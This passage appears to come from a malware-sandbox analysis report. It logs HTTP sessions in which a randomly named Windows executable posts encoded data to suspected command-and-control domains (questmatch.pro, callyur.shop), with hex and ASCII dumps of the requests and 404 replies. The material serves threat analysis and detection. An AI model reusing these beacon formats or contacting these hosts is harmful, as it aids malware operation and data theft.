                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 55 5a 64 59 66 43 41 54 57 63 68 7a 4a 58 71 4a 74 37 44 45 64 73 4b 4f 71 78 64 35 34 47 77 5a 55 73 65 56 34 72 42 71 41 52 55 77 62 62 39 33 66 45 6b 77 6e 44 55 59 31 31 31 32 71 58 32 57 42 72 41 57 67 4f 4b 38 6d 4d 39 53 6d 7a 6f 67 78 72 44 49 51 4c 4c 74 74 54 6c 4f 37 50 39 67 30 53 72 64 78 54 57 53 4c 49 31 66 58 54 34 6a 4c 37 59 72 6a 72 52 73 76 69 59 45 6a 55 39 6e 6f 57 75 64 79 64 42 65 42 63 58 65 6f 41 36 76 49 6e 74 75 72 4b 70 31 57 38 50 62 49 4d 38 58 79 57 47 59 30 2b 53 7a 74 75 61 58 70 76 68 49 36 33 5a 38 48 75 79 66 6e 44 66 52 47 38 75 65
                                                                                  Data Ascii: GR54yHZ8=BC3Wr1zDDmuZUZdYfCATWchzJXqJt7DEdsKOqxd54GwZUseV4rBqARUwbb93fEkwnDUY1112qX2WBrAWgOK8mM9SmzogxrDIQLLttTlO7P9g0SrdxTWSLI1fXT4jL7YrjrRsviYEjU9noWudydBeBcXeoA6vInturKp1W8PbIM8XyWGY0+SztuaXpvhI63Z8HuyfnDfRG8ue
                                                                                  Nov 20, 2024 08:33:13.288774014 CET1236INHTTP/1.1 404
                                                                                  Date: Wed, 20 Nov 2024 07:33:13 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: bf8ec536-c5dc-48c0-8e8e-2c5256a157ca
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9sQwa5CrbQRmfu%2BZRtS7XW%2BL16yvxzK5Gs2svE7Wls0nsRzIPIG38UkE2ZwmA9%2FmOIBElDmD8ZdfpTcAkZjBKnc4gU%2FCo7WjBDjwVXYGDeRezVqoaOfHb%2BfRVp5YQHn%2BGFcn79Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c0249a74c34b-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1623&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=816&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e c1 0a 82 40 14 45 7f 65 b8 6b 45 33 c7 64 3e 20 70 63 41 ed a2 c5 f8 e6 59 d2 34 2f 46 5d 44 f8 ef 21 ae cf e1 70 7e e8 c4 7d 61 c2 ec 7d 02 8e 51 e2 08 f3 03 89 63 98 32 2f 13 04 fb 66 18 b4 32 a9 a3 cc c1 21 81 e3 c9 0e 7e 84 b9 a1 15 f5 b4 c1 79 8e aa 5f a9 ea 25 aa f3 e9
                                                                                  Data Ascii: b4$@EekE3d> pcAY4/F]D!p~}a}Qc2/f2!~y_%
                                                                                  Nov 20, 2024 08:33:13.288794994 CET83INData Raw: 72 55 d9 f0 71 55 86 fb b2 fa dd fc 68 42 2f 5b 3a 46 f6 76 1a 24 34 0e 06 5d 5f 33 e9 7d 95 92 76 94 96 35 e5 69 cd 35 a7 05 e9 42 57 76 a7 0f 64 91 60 9c 2c bd ae d1 12 6f b7 cb f2 07 00 00 ff ff 03 00 9d 4d 47 98 bc 00 00 00 0d 0a 30 0d 0a 0d
                                                                                  Data Ascii: rUqUhB/[:Fv$4]_3}v5i5BWvd`,oMG0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.650009188.114.96.3803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:15.255605936 CET840OUTPOST /ipd6/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/ipd6/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 56 35 4e 59 65 68 59 54 65 63 68 79 4b 58 71 4a 30 4c 44 41 64 74 32 4f 71 7a 78 70 34 79 63 5a 61 75 47 56 35 71 42 71 4d 78 55 77 56 37 39 76 43 55 6b 37 6e 45 63 71 31 31 4a 32 71 58 79 57 42 76 45 57 68 2f 4b 39 67 63 39 51 75 54 6f 69 73 37 44 49 51 4c 4c 74 74 54 78 6b 37 50 56 67 30 43 62 64 77 32 36 56 43 6f 31 59 51 54 34 6a 50 37 5a 69 6a 72 52 65 76 6a 46 70 6a 58 56 6e 6f 54 53 64 72 73 42 64 49 63 58 59 73 41 36 36 45 57 51 6e 70 72 45 46 4a 4e 66 57 54 38 73 57 33 67 62 43 6f 4e 53 51 2f 2b 36 56 70 74 35 36 36 58 5a 57 46 75 4b 66 31 55 54 32 4a 49 4c 39 69 37 42 54 77 66 6f 33 38 38 54 52 73 43 5a 4a 71 6d 49 49 48 41 3d 3d
                                                                                  Data Ascii: GR54yHZ8=BC3Wr1zDDmuZV5NYehYTechyKXqJ0LDAdt2Oqzxp4ycZauGV5qBqMxUwV79vCUk7nEcq11J2qXyWBvEWh/K9gc9QuTois7DIQLLttTxk7PVg0Cbdw26VCo1YQT4jP7ZijrRevjFpjXVnoTSdrsBdIcXYsA66EWQnprEFJNfWT8sW3gbCoNSQ/+6Vpt566XZWFuKf1UT2JIL9i7BTwfo388TRsCZJqmIIHA==
                                                                                  Nov 20, 2024 08:33:15.886771917 CET1236INHTTP/1.1 404
                                                                                  Date: Wed, 20 Nov 2024 07:33:15 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 9aec1926-cafa-452e-aa7d-0425c9cda55f
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Lvr2uCh35MA86m2MQpiukXM0ZRmH9T6%2B3Mr5upwZxjVDyiC8aTLglePHJmMbKfj%2BuBiQU9Wb18wngcW8exNZO4Wcdm%2Fq3KQDWEUAw0QwmCWA2FGiHb1wMO03M7oLijhWEfc5Qs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c034cc058cc8-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4981&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=840&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e c1 0a 82 40 14 45 7f 65 b8 6b 25 13 2d 9c 0f 08 dc 58 90 bb 68 f1 9c f7 a6 a4 69 5e 8c ba 88 f0 df 23 5a 9f c3 e1 7c 30 28 bf 61 e3 12 42 06 49 49 d3 04 fb 81 53 16 d8 aa a8 32 44 7a 0a 2c 3a 9d cd 41 97 c8 c8 c0 32 d3 18 26 d8 0b 3a 35 77 8a 1c 24 19 ff a3 c6 6b 32 a7 e3 b9 37 9b f1 c5 bb 0d
                                                                                  Data Ascii: b3$@Eek%-Xhi^#Z|0(aBIIS2Dz,:A2&:5w$k27
                                                                                  Nov 20, 2024 08:33:15.886794090 CET76INData Raw: ae eb cf 1f 96 5b 1b bd fe d3 29 49 a0 79 d4 d8 32 2c 1a 12 b7 6d ca 5d ee c8 53 5e d5 a5 e4 44 7b ce 8b aa ac 5d e3 98 ea da 23 c3 34 93 7b f4 89 9c fc 6f d7 f5 0b 00 00 ff ff 03 00 35 b6 32 a5 bc 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: [)Iy2,m]S^D{]#4{o520


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.650010188.114.96.3803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:17.809768915 CET1853OUTPOST /ipd6/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/ipd6/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 56 35 4e 59 65 68 59 54 65 63 68 79 4b 58 71 4a 30 4c 44 41 64 74 32 4f 71 7a 78 70 34 79 55 5a 61 66 6d 56 37 4a 5a 71 4e 78 55 77 64 62 39 37 43 55 6b 63 6e 46 35 68 31 31 46 6d 71 52 75 57 42 4b 51 57 6d 4e 75 39 70 63 39 51 69 7a 6f 6e 78 72 43 53 51 50 58 68 74 54 68 6b 37 50 56 67 30 45 33 64 77 6a 57 56 4f 49 31 66 58 54 34 2f 4c 37 5a 4b 6a 72 5a 4f 76 6a 42 66 69 6e 31 6e 70 33 4f 64 70 36 39 64 44 63 58 61 72 41 37 2f 45 57 63 6b 70 72 5a 30 4a 4e 71 39 54 36 51 57 30 30 2b 31 34 66 47 5a 6d 34 36 56 79 75 45 51 78 69 39 35 63 65 43 30 39 57 48 70 42 6f 50 78 76 38 35 4b 6d 64 64 33 70 73 6a 77 79 45 39 57 6c 79 68 36 59 46 67 4c 31 6b 41 6f 7a 56 6f 62 6e 38 37 47 79 79 5a 46 37 7a 59 50 4d 47 33 6a 68 49 79 55 34 68 68 51 57 68 38 53 48 56 38 70 58 66 4d 56 6e 69 71 4d 38 53 38 7a 68 4d 47 67 39 6b 2b 56 53 2f 62 5a 42 57 45 2f 6a 6e 48 5a 72 6d 47 4a 39 4c 4c 4c 62 78 5a 33 6c 42 64 4c 6e 6b 78 56 53 6c 43 37 5a 45 39 66 50 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=BC3Wr1zDDmuZV5NYehYTechyKXqJ0LDAdt2Oqzxp4yUZafmV7JZqNxUwdb97CUkcnF5h11FmqRuWBKQWmNu9pc9QizonxrCSQPXhtThk7PVg0E3dwjWVOI1fXT4/L7ZKjrZOvjBfin1np3Odp69dDcXarA7/EWckprZ0JNq9T6QW00+14fGZm46VyuEQxi95ceC09WHpBoPxv85Kmdd3psjwyE9Wlyh6YFgL1kAozVobn87GyyZF7zYPMG3jhIyU4hhQWh8SHV8pXfMVniqM8S8zhMGg9k+VS/bZBWE/jnHZrmGJ9LLLbxZ3lBdLnkxVSlC7ZE9fPkM+nUD2uT+mGiQP7eHqrlXXzp/vGDuntHx1+ERDUrTBkG/+FTAZd9o6bTsic6nwK7pFlmR9Ph0JeSesgEF3aH+ddfkL82Jt6wSe2W3y4bADAkJ2894lXhEA5gZSZOZhRMon7GqrgO02uNMU+8L2kY3TgbR1aSrxk3F2Z6O7nIJztSRBJPt7Fgdtr2rZxvQ3lvAzBRRWPj/I4Sa0RopmJJFvcNlYAqDq20uGF28lm/DKby7XuBYj6ng+Q6OvSCF6V3Fl1+a+IVIX08ofesrb5ukoJ1jV259fhKPIlygGY+vvTODCzNtP4J9XPQGgBsca3bgMw1KQcW80lpvDueQiHQ8qM+Jxw8xy4PcB7ItKYKHnHGYXrdUHxesRsyf0scur5eQdP271Cgj5GfOeYNyuS2N0F9hgQcmYNFMRj0+Gfgf4NBXOb4ixKpfukrhREuZTHNtM5Io3WfNt/2Q4kTrZwDE2tEveRej60RytcnUG2Xw9knfmw8wt4aGe/5J4MW9tp2lokGOh6BpCPuw0S/C+Ghveylo/bqIf2LBXMx9f990J0idpmC9HAzOfkGLF3Bl4QPS1HZn7S3VIfiAEjl9vnzRw6MIoWL62omLxPX6sexnzTAy4ix4OM33zX7qSOVpJdc3gtJSPxwM0esgtHVy7sO9E9/OIf4al3Qo [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:18.423091888 CET1236INHTTP/1.1 404
                                                                                  Date: Wed, 20 Nov 2024 07:33:18 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 942dc704-fdbc-4f85-ab79-cf3b078b69ca
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9r7YXTCGWgm700kcS69%2BSKgT1T4CmyhXxMlraSWXaxYu6a75xU%2FtiEj%2BBPowqk61VXQwrlILagut3d9in0kJoWOztCFXLG69KVaBfm828FrCNzHo33%2BN68EMOAzLL6SFkULDNQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c044acf741cf-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2036&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1853&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 41 0e 82 30 14 05 af d2 bc 35 04 a2 15 a4 07 30 61 83 26 b2 33 2e da fe 56 89 b5 df 14 58 18 c2 dd 0d 71 3d 93 c9 2c 30 4c 5f a8 38 87 90 c1 a5 c4 69 84 5a 60 99 1c 94 2c 65 86 a8 df 0e 0a 1d 4f e2 c4 73 24 64 20 37 e9 21 8c 50 37 74 2c 9e 3a 52 70 49 f8 8d 0a cf 49 5c ce d7 5e 14 c3
                                                                                  Data Ascii: b5$A050a&3.VXq=,0L_8iZ`,eOs$d 7!P7t,:RpII\^
                                                                                  Nov 20, 2024 08:33:18.423111916 CET81INData Raw: 87 aa 02 f7 75 f3 cd fc 68 a3 e7 7f 3a 25 17 f4 34 70 6c 09 0a 8d dc 91 ad 4b 99 7b 32 36 97 fe 78 c8 b5 a9 9b dc fa bd 29 eb a3 a9 1a ab 91 61 9c b4 7d f5 49 5b f7 bf 5d d7 1f 00 00 00 ff ff 03 00 13 61 45 b9 bc 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: uh:%4plK{26x)a}I[]aE0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.650011188.114.96.3803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:20.356177092 CET556OUTGET /ipd6/?9xn=fHadNpk8MVax&GR54yHZ8=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5uc/jX4WzK3nYbDP1BFL1MIpigvL/S+Ybe5ZZiUbOMV88bEfnEo= HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:33:20.999013901 CET1236INHTTP/1.1 404
                                                                                  Date: Wed, 20 Nov 2024 07:33:20 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 5a33ab18-f6fa-4238-b654-c7dd8d5e838c
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TL5%2FNRGcFgnmftMw3vc2UNJtWO%2B%2FvLGW%2B0Q1X9tuPXRe7%2FD2%2FCnsYv59KDxVMIZtY4x3KcJkgX3kH8wdSp9cphzdpeGxEQD0JO8kKdzCZq2vXEXiRQkkarCrF9D%2FDbEQHDKNwTI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c054bdaa0f5f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1470&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=556&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 62 0d 0a 7b 22 62 6f 64 79 22 3a 6e 75 6c 6c 2c 22 65 72 72 6f 72 73 22 3a 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 20 68 61 6e 64 6c 65 72 20 66 6f 75 6e 64 20 66 6f 72 20 47 45 54 20 2f 69 70 64 36 2f 22 5d 7d 2c 22 64 65 62 75 67 49 6e 66 6f 22 3a 7b 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49
                                                                                  Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /ipd6/"]},"debugInfo":{"correlationI
                                                                                  Nov 20, 2024 08:33:20.999037027 CET68INData Raw: 64 22 3a 22 35 61 33 33 61 62 31 38 2d 66 36 66 61 2d 34 32 33 38 2d 62 36 35 34 2d 63 37 64 64 38 64 35 65 38 33 38 63 22 2c 22 73 74 61 63 6b 54 72 61 63 65 22 3a 6e 75 6c 6c 7d 7d 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: d":"5a33ab18-f6fa-4238-b654-c7dd8d5e838c","stackTrace":null}}0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.65001466.29.137.10803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:26.071649075 CET810OUTPOST /hayl/ HTTP/1.1
                                                                                  Host: www.callyur.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.callyur.shop
                                                                                  Referer: http://www.callyur.shop/hayl/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 36 52 37 6b 47 31 66 57 53 38 58 53 68 31 6b 61 78 44 68 56 65 78 72 54 57 47 49 52 4f 56 78 73 61 42 72 6b 4d 79 4b 53 37 43 43 4d 49 2f 31 71 54 42 4c 35 30 42 4e 6d 65 2f 33 6c 30 56 48 78 57 49 70 2f 56 45 75 66 44 42 73 37 35 61 69 38 72 4f 58 41 71 43 49 67 61 42 77 31 65 43 76 32 79 39 41 34 31 56 66 78 30 36 51 77 69 41 62 70 78 7a 48 45 62 6a 36 75 4f 55 70 47 63 71 6a 72 55 6b 2f 67 59 69 73 7a 6a 64 38 44 35 63 59 58 36 75 64 65 65 39 47 61 52 77 4a 6c 6f 51 6a 54 4f 73 42 4e 4f 74 36 61 36 6b 73 2b 4c 4d 63 62 39 30 4b 4f 59 6b 4e 6f 76 66 4a 69 33 76 6a
                                                                                  Data Ascii: GR54yHZ8=2soVY/BCKwRxo6R7kG1fWS8XSh1kaxDhVexrTWGIROVxsaBrkMyKS7CCMI/1qTBL50BNme/3l0VHxWIp/VEufDBs75ai8rOXAqCIgaBw1eCv2y9A41Vfx06QwiAbpxzHEbj6uOUpGcqjrUk/gYiszjd8D5cYX6udee9GaRwJloQjTOsBNOt6a6ks+LMcb90KOYkNovfJi3vj
                                                                                  Nov 20, 2024 08:33:26.642684937 CET1236INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 20 Nov 2024 07:33:26 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5a 7a ff ef 53 10 a7 92 cc 94 da ad 15 10 1e bb 67 b4 21 09 90 90 04 02 44 2a 75 4b bb 84 56 b4 c3 54 1e 28 af 91 27 cb 11 b6 db 98 b6 6f f7 a4 f2 23 a7 7f 18 9d e5 db 97 d3 df 77 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f ff 0c c0 78 0c 5c d3 f9 f6 db e5 67 e2 56 26 d8 51 e5 f7 ee b1 0e 9b a7 3b 26 4b 2b 37 ad ee ab 53 ee de 0d ec e7 af a7 bb ca ed 2a b8 07 f1 97 81 1d 98 45 e9 56 4f 75 e5 dd 93 77 9f c2 31 ed c0 bd ef cf 17 59 7c 05 28 cd ee ed 7e e9 d3 83 4a 61 fa 89 f9 8f 9c e0 ba 3c 2c dc f2 ea 08 f2 0e 7a 6a 26 ee d3 5d 13 ba 6d 9e 15 d5 d5 b6 36 74 aa e0 c9 71 9b d0 76 ef 2f 1f 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c9 67 51 96 d5 29 76 07 bd dc 5e c4 65 97 e5 0b 1d bd a8 ad cc 39 0d fe 7e d9 da 7f f6 c3 03 d2 b9 f7 cc 24 8c 4f 0f 03 aa 00 68 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 1e 2b c3 b3 fb 30 40 89 bc 7b bf 18 87 a9 7b [TRUNCATED]
                                                                                  Data Ascii: 1348:rZzSg!D*uKVT('o#w~bPAP%x\gV&Q;&K+7S*EVOuw1Y|(~Ja<,zj&]m6tqv/_aVOoBL:ugQ)v^e9~$Oh7n*/L-B/?+0@{{T`+1J`,(?{~61yf>1?LMwK,X*ylYXqfGgbz&>v= %^g)E5W`y}zre.2qyVANYf$?Se/5q+e|HooKa@\WZk0\OWe]qyKS>0`G?Rqaxc-+I+^kgaB[A=WxD3WC5nqe_x2.?_6Ain=WD|nq#EF7=-L/1euI+ 2x#W+u7y]qh81\4ml[z7/FK901[5~g{9r@K~y5?67=_$u` +%nC$y}VC625?- :3>4D%~)
                                                                                  Nov 20, 2024 08:33:26.642726898 CET224INData Raw: 9b 1a de e8 f9 5b e2 3a a1 39 f8 53 02 02 e9 8b 62 c6 23 32 ef fe 7c 83 e6 d6 6a 6f 96 7b e1 e5 59 79 c9 50 0f 83 c2 8d 41 ac 6b 6e 1c b0 df d3 47 2c e0 3f ed c3 20 08 1d c7 4d df 48 ea 57 fb 71 95 9f 2e 96 fd ec d7 ef f7 bd 91 df 9f b8 25 ed c3
                                                                                  Data Ascii: [:9Sb#2|jo{YyPAknG,? MHWq.%,o?FH"{/j_vGI?)':KCKY~Ui0,fHb5*M~k\Ufq]}\/
                                                                                  Nov 20, 2024 08:33:26.642762899 CET1236INData Raw: f1 ab f8 d1 9f ec c7 eb f5 e6 83 a5 57 96 90 9b 7b 7a 7f ec 46 38 2f 17 ee 67 ed 7f 60 40 37 f9 fa 33 c5 bf 41 fd 20 f8 4c 26 40 b4 ff 8b e0 f3 63 d8 a8 8b f8 4f 8e 59 99 0f 97 30 02 e7 a9 ff 17 cb 2c dd 11 f1 25 dc d0 4b ad 45 e6 bc 9f 51 60 c8
                                                                                  Data Ascii: W{zF8/g`@73A L&@cOY0,%KEQ`+=tROP!p?`cyAM=/P8tuVEUo-XYqO5cw#/X0H8S2cL4nPv/ImVqf]>D
                                                                                  Nov 20, 2024 08:33:26.642796040 CET1236INData Raw: 81 e2 76 b8 6c 8a ea a2 15 44 51 8d d5 48 b1 da 52 9b e6 4e e2 58 70 c0 92 eb 15 cb b4 6b ba 26 b7 38 52 ae c4 70 35 06 16 d3 ee c7 8c 4f b9 ec 21 36 a5 49 54 51 2c 02 49 5d 0b 8a d3 e4 ae 5c 9b 52 a6 89 19 63 ee 13 1f a7 55 7f 71 2c 84 0d 43 d7
                                                                                  Data Ascii: vlDQHRNXpk&8Rp5O!6ITQ,I]\RcUq,C1eCL)O6c94\[fbr5%rJHP0R#nUDliK",pPjlkm,P9f)d0<"{d9I#U#X*z4
                                                                                  Nov 20, 2024 08:33:26.642832994 CET448INData Raw: 8b d3 b8 96 47 8a 0b b7 54 5a d0 dd 32 a5 cc 93 b8 5a 6c 23 95 6c 33 7a 7e d2 20 c8 d1 d7 65 cd cd a1 05 99 63 34 4b 78 bc 53 7a c7 a0 e3 d5 b5 ba 8f 6b 41 5f ec 0a ad 04 97 2b 9a 43 96 fe 59 8c 0b 53 23 9b a8 1d 1d d3 5d 52 b3 ab 29 a9 f9 2b b2
